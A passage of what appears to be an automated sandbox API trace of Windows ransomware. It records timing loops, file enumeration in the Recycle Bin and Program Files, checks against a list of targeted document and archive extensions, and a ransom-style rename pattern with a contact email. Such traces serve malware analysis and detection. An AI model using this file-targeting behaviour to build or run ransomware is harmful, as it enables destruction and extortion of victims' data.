	[0140.899] GetTickCount () returned 0x1134d65
	[0140.899] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0141.177] GetTickCount () returned 0x1134e7e
	[0141.177] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0141.348] GetTickCount () returned 0x1134f2a
	[0141.348] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0141.493] GetTickCount () returned 0x1134fb6
	[0141.493] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0141.850] GetTickCount () returned 0x113511d
	[0141.850] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0142.067] GetTickCount () returned 0x11351f7
	[0142.067] GetTickCount () returned 0x11351f7
	[0142.067] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0142.382] GetTickCount () returned 0x113532f
	[0142.382] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0142.489] GetTickCount () returned 0x113539d
	[0142.489] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0142.710] GetTickCount () returned 0x1135477
	[0142.710] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0142.923] GetTickCount () returned 0x1135551
	[0142.923] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0143.198] GetTickCount () returned 0x113565b
	[0143.198] GetTickCount () returned 0x113565b
	[0143.198] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0143.371] GetTickCount () returned 0x1135706
	[0143.371] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0143.734] GetTickCount () returned 0x113587d
	[0143.736] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0143.907] GetTickCount () returned 0x1135928
	[0143.908] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0144.294] GetTickCount () returned 0x1135aae
	[0144.294] GetTickCount () returned 0x1135aae
	[0144.294] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0144.696] GetTickCount () returned 0x1135c34
	[0144.696] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0145.179] GetTickCount () returned 0x1135e18
	[0145.179] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0145.482] GetTickCount () returned 0x1135f50
	[0145.482] GetTickCount () returned 0x1135f50
	[0145.482] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0145.627] GetTickCount () returned 0x1135fdc
	[0145.627] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0146.040] GetTickCount () returned 0x1136181
	[0146.040] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0146.352] GetTickCount () returned 0x11362b9
	[0146.352] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0146.648] GetTickCount () returned 0x11363e2
	[0146.648] GetTickCount () returned 0x11363e2
	[0146.648] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0146.995] GetTickCount () returned 0x1136539
	[0146.995] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0147.339] GetTickCount () returned 0x1136690
	[0147.339] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0147.590] GetTickCount () returned 0x113678a
	[0147.590] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0147.990] GetTickCount () returned 0x113691f
	[0147.990] GetTickCount () returned 0x113691f
	[0147.990] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0148.193] GetTickCount () returned 0x11369ea
	[0148.193] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0148.654] GetTickCount () returned 0x1136baf
	[0148.654] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0148.898] GetTickCount () returned 0x1136ca8
	[0148.898] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0149.360] GetTickCount () returned 0x1136e6d
	[0149.360] GetTickCount () returned 0x1136e6d
	[0149.360] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0149.596] GetTickCount () returned 0x1136f66
	[0149.596] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0149.807] GetTickCount () returned 0x1137031
	[0149.807] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0149.942] GetTickCount () returned 0x11370bd
	[0149.942] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0150.118] GetTickCount () returned 0x1137169
	[0150.118] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0150.328] GetTickCount () returned 0x1137234
	[0150.328] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0150.839] GetTickCount () returned 0x1137437
	[0150.839] GetTickCount () returned 0x1137437
	[0150.839] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0151.923] GetTickCount () returned 0x113787b
	[0151.923] GetTickCount () returned 0x113787b
	[0151.923] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0152.257] GetTickCount () returned 0x11379c2
	[0152.257] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0153.092] GetTickCount () returned 0x1137d0d
	[0153.092] GetTickCount () returned 0x1137d0d
	[0153.092] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0153.337] GetTickCount () returned 0x1137df7
	[0153.337] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0153.627] GetTickCount () returned 0x1137f1f
	[0153.627] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0154.144] GetTickCount () returned 0x1138122
	[0154.144] GetTickCount () returned 0x1138122
	[0154.144] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0154.361] GetTickCount () returned 0x11381fc
	[0154.361] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0154.494] GetTickCount () returned 0x1138289
	[0154.494] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0154.952] GetTickCount () returned 0x113844d
	[0154.952] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0155.278] GetTickCount () returned 0x1138595
	[0155.278] GetTickCount () returned 0x1138595
	[0155.278] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0155.578] GetTickCount () returned 0x11386bd
	[0155.578] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0155.854] GetTickCount () returned 0x11387d6
	[0155.854] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0156.033] GetTickCount () returned 0x1138881
	[0156.033] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0156.517] GetTickCount () returned 0x1138a65
	[0156.517] GetTickCount () returned 0x1138a65
	[0156.517] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0156.749] GetTickCount () returned 0x1138b4f
	[0156.749] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0156.903] GetTickCount () returned 0x1138beb
	[0156.903] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0157.322] GetTickCount () returned 0x1138d90
	[0157.322] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0157.584] GetTickCount () returned 0x1138e99
	[0157.584] GetTickCount () returned 0x1138e99
	[0157.584] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0157.857] GetTickCount () returned 0x1138fa3
	[0157.857] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0158.081] GetTickCount () returned 0x113907d
	[0158.081] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0158.306] GetTickCount () returned 0x1139167
	[0158.306] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x0
	[0158.307] GetTickCount () returned 0x1139167
	[0158.307] Sleep (dwMilliseconds=0x64) 
	[0158.617] GetTickCount () returned 0x113929f
	[0158.617] GetTickCount () returned 0x113929f
	[0158.617] Sleep (dwMilliseconds=0x64) 
	[0158.826] GetTickCount () returned 0x113936a
	[0158.826] Sleep (dwMilliseconds=0x64) 
	[0159.405] GetTickCount () returned 0x11395ab
	[0159.405] Sleep (dwMilliseconds=0x64) 
	[0159.609] GetTickCount () returned 0x1139676
	[0159.609] Sleep (dwMilliseconds=0x64) 
	[0159.927] GetTickCount () returned 0x11397bd
	[0159.927] GetTickCount () returned 0x11397bd
	[0159.927] Sleep (dwMilliseconds=0x64) 
	[0160.153] GetTickCount () returned 0x1139898
	[0160.153] Sleep (dwMilliseconds=0x64) 
	[0160.442] GetTickCount () returned 0x11399c0
	[0160.442] Sleep (dwMilliseconds=0x64) 
	[0160.871] GetTickCount () returned 0x1139b65
	[0160.871] Sleep (dwMilliseconds=0x64) 
	[0161.493] GetTickCount () returned 0x1139dd6
	[0161.493] GetTickCount () returned 0x1139dd6
	[0161.493] Sleep (dwMilliseconds=0x64) 
	[0162.184] GetTickCount () returned 0x113a084
	[0162.184] Sleep (dwMilliseconds=0x64) 
	[0162.458] GetTickCount () returned 0x113a19d
	[0162.458] Sleep (dwMilliseconds=0x64) 
	[0162.624] GetTickCount () returned 0x113a248
	[0162.624] GetTickCount () returned 0x113a248
	[0162.624] Sleep (dwMilliseconds=0x64) 
	[0162.903] GetTickCount () returned 0x113a361
	[0162.903] Sleep (dwMilliseconds=0x64) 
	[0163.382] GetTickCount () returned 0x113a535
	[0163.382] Sleep (dwMilliseconds=0x64) 
	[0163.641] GetTickCount () returned 0x113a63e
	[0163.641] GetTickCount () returned 0x113a63e
	[0163.641] Sleep (dwMilliseconds=0x64) 
	[0164.057] GetTickCount () returned 0x113a7e4
	[0164.057] Sleep (dwMilliseconds=0x64) 
	[0164.199] GetTickCount () returned 0x113a870
	[0164.199] Sleep (dwMilliseconds=0x64) 
	[0164.540] GetTickCount () returned 0x113a9c7
	[0164.540] Sleep (dwMilliseconds=0x64) 
	[0164.708] GetTickCount () returned 0x113aa63
	[0164.708] GetTickCount () returned 0x113aa63
	[0164.708] Sleep (dwMilliseconds=0x64) 
	[0164.885] GetTickCount () returned 0x113ab1e
	[0164.885] Sleep (dwMilliseconds=0x64) 
	[0165.221] GetTickCount () returned 0x113ac66
	[0165.221] Sleep (dwMilliseconds=0x64) 
	[0165.564] GetTickCount () returned 0x113adbd
	[0165.564] Sleep (dwMilliseconds=0x64) 
	[0165.704] GetTickCount () returned 0x113ae4a
	[0165.704] Sleep (dwMilliseconds=0x64) 
	[0166.158] GetTickCount () returned 0x113b00e
	[0166.158] GetTickCount () returned 0x113b00e
	[0166.158] Sleep (dwMilliseconds=0x64) 
	[0166.316] GetTickCount () returned 0x113b0aa
	[0166.316] Sleep (dwMilliseconds=0x64) 
	[0166.446] GetTickCount () returned 0x113b136
	[0166.446] Sleep (dwMilliseconds=0x64) 
	[0166.557] GetTickCount () returned 0x113b1a4
	[0166.557] Sleep (dwMilliseconds=0x64) 
	[0166.799] GetTickCount () returned 0x113b28e
	[0166.799] Sleep (dwMilliseconds=0x64) 
	[0167.126] GetTickCount () returned 0x113b3d5
	[0167.126] Sleep (dwMilliseconds=0x64) 
	[0167.232] GetTickCount () returned 0x113b442
	[0167.232] GetTickCount () returned 0x113b442
	[0167.232] Sleep (dwMilliseconds=0x64) 
	[0167.334] GetTickCount () returned 0x113b4b0
	[0167.334] Sleep (dwMilliseconds=0x64) 
	[0167.446] GetTickCount () returned 0x113b51d
	[0167.446] Sleep (dwMilliseconds=0x64) 
	[0167.609] GetTickCount () returned 0x113b5c8
	[0167.609] Sleep (dwMilliseconds=0x64) 
	[0167.731] GetTickCount () returned 0x113b636
	[0167.731] Sleep (dwMilliseconds=0x64) 
	[0167.860] GetTickCount () returned 0x113b6b2
	[0167.860] Sleep (dwMilliseconds=0x64) 
	[0168.051] GetTickCount () returned 0x113b76e
	[0168.051] Sleep (dwMilliseconds=0x64) 
	[0168.198] GetTickCount () returned 0x113b80a
	[0168.198] Sleep (dwMilliseconds=0x64) 
	[0168.312] GetTickCount () returned 0x113b877
	[0168.312] GetTickCount () returned 0x113b877
	[0168.312] Sleep (dwMilliseconds=0x64) 
	[0168.432] GetTickCount () returned 0x113b8e4
	[0168.432] Sleep (dwMilliseconds=0x64) 
	[0168.537] GetTickCount () returned 0x113b951
	[0168.537] Sleep (dwMilliseconds=0x64) 
	[0168.791] GetTickCount () returned 0x113ba4b
	[0168.791] Sleep (dwMilliseconds=0x64) 
	[0168.890] GetTickCount () returned 0x113bab8
	[0168.890] Sleep (dwMilliseconds=0x64) 
	[0169.244] GetTickCount () returned 0x113bc1f
	[0169.244] Sleep (dwMilliseconds=0x64) 
	[0169.459] GetTickCount () returned 0x113bcea
	[0169.459] GetTickCount () returned 0x113bcea
	[0169.459] Sleep (dwMilliseconds=0x64) 
	[0169.635] GetTickCount () returned 0x113bda5
	[0169.635] Sleep (dwMilliseconds=0x64) 
	[0169.822] GetTickCount () returned 0x113be60
	[0169.822] Sleep (dwMilliseconds=0x64) 
	[0170.080] GetTickCount () returned 0x113bf5a
	[0170.080] Sleep (dwMilliseconds=0x64) 
	[0170.197] GetTickCount () returned 0x113bfd6
	[0170.197] Sleep (dwMilliseconds=0x64) 
	[0170.426] GetTickCount () returned 0x113c0b1
	[0170.426] Sleep (dwMilliseconds=0x64) 
	[0170.592] GetTickCount () returned 0x113c15c
	[0170.592] GetTickCount () returned 0x113c15c
	[0170.592] Sleep (dwMilliseconds=0x64) 
	[0170.740] GetTickCount () returned 0x113c1e9
	[0170.740] Sleep (dwMilliseconds=0x64) 
	[0170.929] GetTickCount () returned 0x113c2b4
	[0170.929] Sleep (dwMilliseconds=0x64) 
	[0171.273] GetTickCount () returned 0x113c40b
	[0171.273] Sleep (dwMilliseconds=0x64) 
	[0171.574] GetTickCount () returned 0x113c533
	[0171.574] Sleep (dwMilliseconds=0x64) 
	[0171.757] GetTickCount () returned 0x113c5ee
	[0171.757] GetTickCount () returned 0x113c5ee
	[0171.757] Sleep (dwMilliseconds=0x64) 

Thread:
	id = 55
	os_tid = 0x768

	[0137.416] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10000) returned 0x9f50048
	[0137.417] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10000) returned 0x9f60050
	[0137.417] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7bae9f8
	[0137.417] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x6) returned 0x7bac7f8
	[0137.417] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7baea10
	[0137.417] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x100000) returned 0xae50020
	[0137.417] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7baea28
	[0137.417] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7baea28, Size=0x20) returned 0x7b65ba8
	[0137.417] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7baea28
	[0137.417] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7baea28, Size=0x20) returned 0x7b65bd0
	[0137.417] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77080000
	[0137.417] GetProcAddress (hModule=0x77080000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x770ad650
	[0137.417] Wow64DisableWow64FsRedirection (in: OldValue=0xa2cff58 | out: OldValue=0xa2cff58*=0x0) returned 1
	[0137.417] lstrlenW (lpString="kernel32.dll") returned 12
	[0137.418] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b65ba8 | out: hHeap=0x7ab0000) returned 1
	[0137.418] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30
	[0137.418] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b65bd0 | out: hHeap=0x7ab0000) returned 1
	[0137.418] Sleep (dwMilliseconds=0x64) 
	[0137.595] lstrcmpiW (lpString1=".ini", lpString2=".bot") returned 1
	[0137.595] lstrlenW (lpString="desktop.ini") returned 11
	[0137.596] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268
	[0137.600] GetFileSizeEx (in: hFile=0x268, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=129) returned 1
	[0137.600] CloseHandle (hObject=0x268) returned 1
	[0137.600] GetFileAttributesW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini")) returned 0x26
	[0137.601] GetFileAttributesW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.id-9c354b42.[admin@sectex.net].bot")) returned 0x26
	[0137.604] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74
	[0137.604] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74
	[0137.604] lstrlenW (lpString=".doc") returned 4
	[0137.604] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1
	[0137.604] lstrlenW (lpString=".docx") returned 5
	[0137.604] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1
	[0137.604] lstrlenW (lpString=".pdf") returned 4
	[0137.604] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1
	[0137.604] lstrlenW (lpString=".xls") returned 4
	[0137.604] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1
	[0137.604] lstrlenW (lpString=".xlsx") returned 5
	[0137.604] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1
	[0137.604] lstrlenW (lpString=".ppt") returned 4
	[0137.605] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1
	[0137.605] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74
	[0137.605] lstrlenW (lpString=".zip") returned 4
	[0137.605] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1
	[0137.605] lstrlenW (lpString=".rar") returned 4
	[0137.605] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1
	[0137.605] lstrlenW (lpString=".bz2") returned 4
	[0137.605] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1
	[0137.605] lstrlenW (lpString=".7z") returned 3
	[0137.605] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1
	[0137.605] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74
	[0137.605] lstrlenW (lpString=".dbf") returned 4
	[0137.605] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1
	[0137.605] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74
	[0137.605] lstrlenW (lpString=".1cd") returned 4
	[0137.605] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1
	[0137.605] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74
	[0137.605] lstrlenW (lpString=".jpg") returned 4
	[0137.605] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1
	[0137.605] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74
	[0137.605] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74
	[0137.605] lstrlenW (lpString=".doc") returned 4
	[0137.605] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1
	[0137.605] lstrlenW (lpString=".docx") returned 5
	[0137.605] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1
	[0137.605] lstrlenW (lpString=".pdf") returned 4
	[0137.605] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1
	[0137.605] lstrlenW (lpString=".xls") returned 4
	[0137.605] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1
	[0137.605] lstrlenW (lpString=".xlsx") returned 5
	[0137.605] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1
	[0137.605] lstrlenW (lpString=".ppt") returned 4
	[0137.605] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1
	[0137.606] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74
	[0137.606] lstrlenW (lpString=".zip") returned 4
	[0137.606] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1
	[0137.606] lstrlenW (lpString=".rar") returned 4
	[0137.606] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1
	[0137.606] lstrlenW (lpString=".bz2") returned 4
	[0137.606] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1
	[0137.606] lstrlenW (lpString=".7z") returned 3
	[0137.606] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1
	[0137.606] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74
	[0137.606] lstrlenW (lpString=".dbf") returned 4
	[0137.606] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1
	[0137.606] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74
	[0137.606] lstrlenW (lpString=".1cd") returned 4
	[0137.606] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1
	[0137.606] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74
	[0137.606] lstrlenW (lpString=".jpg") returned 4
	[0137.606] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1
	[0137.606] Sleep (dwMilliseconds=0x64) 
	[0137.825] Sleep (dwMilliseconds=0x64) 
	[0137.996] lstrcmpiW (lpString1=".avi", lpString2=".bot") returned -1
	[0137.996] lstrlenW (lpString="boxed-split.avi") returned 15
	[0137.996] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0138.766] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=62976) returned 1
	[0138.766] CloseHandle (hObject=0x38c) returned 1
	[0138.766] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi")) returned 0x20
	[0138.766] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0138.766] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0138.766] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72
	[0138.766] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72
	[0138.766] lstrlenW (lpString=".doc") returned 4
	[0138.766] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1
	[0138.767] lstrlenW (lpString=".docx") returned 5
	[0138.767] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1
	[0138.767] lstrlenW (lpString=".pdf") returned 4
	[0138.767] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1
	[0138.767] lstrlenW (lpString=".xls") returned 4
	[0138.767] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1
	[0138.767] lstrlenW (lpString=".xlsx") returned 5
	[0138.767] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1
	[0138.767] lstrlenW (lpString=".ppt") returned 4
	[0138.767] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1
	[0138.767] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72
	[0138.767] lstrlenW (lpString=".zip") returned 4
	[0138.767] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1
	[0138.767] lstrlenW (lpString=".rar") returned 4
	[0138.767] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1
	[0138.767] lstrlenW (lpString=".bz2") returned 4
	[0138.767] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1
	[0138.767] lstrlenW (lpString=".7z") returned 3
	[0138.767] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1
	[0138.767] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72
	[0138.767] lstrlenW (lpString=".dbf") returned 4
	[0138.767] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1
	[0138.767] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72
	[0138.767] lstrlenW (lpString=".1cd") returned 4
	[0138.767] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1
	[0138.767] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72
	[0138.767] lstrlenW (lpString=".jpg") returned 4
	[0138.767] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1
	[0138.767] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72
	[0138.767] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72
	[0138.767] lstrlenW (lpString=".doc") returned 4
	[0138.767] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1
	[0138.767] lstrlenW (lpString=".docx") returned 5
	[0138.767] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1
	[0138.768] lstrlenW (lpString=".pdf") returned 4
	[0138.768] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1
	[0138.768] lstrlenW (lpString=".xls") returned 4
	[0138.768] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1
	[0138.768] lstrlenW (lpString=".xlsx") returned 5
	[0138.768] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1
	[0138.768] lstrlenW (lpString=".ppt") returned 4
	[0138.768] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1
	[0138.768] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72
	[0138.768] lstrlenW (lpString=".zip") returned 4
	[0138.768] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1
	[0138.768] lstrlenW (lpString=".rar") returned 4
	[0138.768] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1
	[0138.768] lstrlenW (lpString=".bz2") returned 4
	[0138.768] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1
	[0138.768] lstrlenW (lpString=".7z") returned 3
	[0138.768] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1
